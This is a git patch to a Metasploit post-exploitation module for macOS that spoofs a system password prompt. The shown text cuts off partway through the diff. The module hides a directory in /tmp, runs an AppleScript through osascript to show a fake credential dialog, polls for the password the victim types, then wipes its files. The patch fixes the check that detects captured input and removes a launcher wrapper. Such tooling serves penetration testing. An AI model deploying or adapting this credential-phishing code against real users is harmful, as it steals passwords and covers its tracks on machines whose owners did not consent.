From 95a98529c4cacc38e2488eb9e74e021786d12b79 Mon Sep 17 00:00:00 2001 From: Peter Toth Date: Wed, 27 Nov 2013 21:38:20 +0100 Subject: [PATCH] Removed script launcher wrapper and fixed the file_exists so that the module now detects input --- .../post/osx/gather/password_prompt_spoof.rb | 86 ++++++++----------- 1 file changed, 34 insertions(+), 52 deletions(-) diff --git a/modules/post/osx/gather/password_prompt_spoof.rb b/modules/post/osx/gather/password_prompt_spoof.rb index 21d2579b9a..7bfa70ee95 100644 --- a/modules/post/osx/gather/password_prompt_spoof.rb +++ b/modules/post/osx/gather/password_prompt_spoof.rb @@ -19,7 +19,8 @@ class Metasploit3 < Msf::Post 'License' => MSF_LICENSE, 'Author' => [ 'Joff Thyer ', # original post module - 'joev' # bug fixes + 'joev', # bug fixes + 'Peter Toth ' # bug fixes ], 'Platform' => [ 'osx' ], 'References' => [ @@ -79,29 +80,23 @@ class Metasploit3 < Msf::Post print_status("Running module against #{host}") dir = "/tmp/." + Rex::Text.rand_text_alpha((rand(8)+6)) - runme = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) creds_osa = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) - creds = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) pass_file = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) username = cmd_exec("/usr/bin/whoami").strip cmd_exec("umask 0077") cmd_exec("/bin/mkdir #{dir}") - # write the script that will launch things - write_file(runme, run_script) - cmd_exec("/bin/chmod 700 #{runme}") - - # write the credentials script, compile and run + # write the credentials script and run write_file(creds_osa,creds_script(pass_file)) - cmd_exec("/usr/bin/osacompile -o #{creds} #{creds_osa}") - cmd_exec("#{runme} #{creds}") + cmd_exec("cat #{creds_osa} | osascript") + print_status("Waiting for user '#{username}' to enter credentials...") timeout = ::Time.now.to_f + datastore['TIMEOUT'].to_i pass_found = false while (::Time.now.to_f < timeout) - if ::File.exist?(pass_file) + if file_exist?(pass_file) print_status("Password entered! What a nice compliant user...") pass_found = true break @@ -122,51 +117,38 @@ class Metasploit3 < Msf::Post cmd_exec("/usr/bin/srm -rf #{dir}") end - # "wraps" the #creds_script applescript and allows it to make UI calls - def run_script - %Q{ - #!/bin/bash - osascript <